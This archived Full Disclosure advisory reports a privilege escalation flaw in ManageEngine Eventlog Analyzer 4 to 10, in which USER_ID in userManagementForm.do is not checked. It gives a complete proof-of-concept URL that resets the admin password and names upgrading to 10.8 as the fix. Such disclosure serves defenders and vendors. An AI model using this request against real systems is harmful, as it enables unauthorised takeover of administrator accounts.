[<prev] [next>] [day] [month] [year] [list]
Message-ID: <d9c8e7310c019f121ee418f9eaca89f8.webmail@localhost>
Date: Fri, 29 Jan 2016 16:16:56 -0000
From: graphx@...aint.org
Subject: [FD] ManageEngine Eventlog Analyzer v4-v10 Privilege Esacalation
# Exploit Title: ManageEngine Eventlog Analyzer Privilege Escalation
# Exploit Author: @GraphX
# Vendor Homepage:http://www.manageengine.com
# Version: 4.0 - 10
1. Description:
The manageengine eventlog analyzer fails to properly verify user
privileges when making changes via the userManagementForm.do. An
unprivileged user would be allowed to make changes to any account by
changing the USER_ID field to a number corresponding to another user.
Testing discovered that the default admin and guest accounts are 1 and 2.
Considering the recent similar vulnerabilities discovered in a more
current version of a similar product by ManageEngine, it is possible that
more versions of the software including current, are vulnerable. According
to the vendor this is fixed in version 10.8.
2) Proof of Concept
-login as an unprivileged user
-Use the following URL to change the admin password to "admin"
http://<IP_ADDRESS>/event/userManagementForm.do?addField=false&action=request.getParameter(&password=admin&email=&USER_ID=1&Submit=Save+User+Details&userName=admin
3 Solution:
Upgrade to 10.8
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists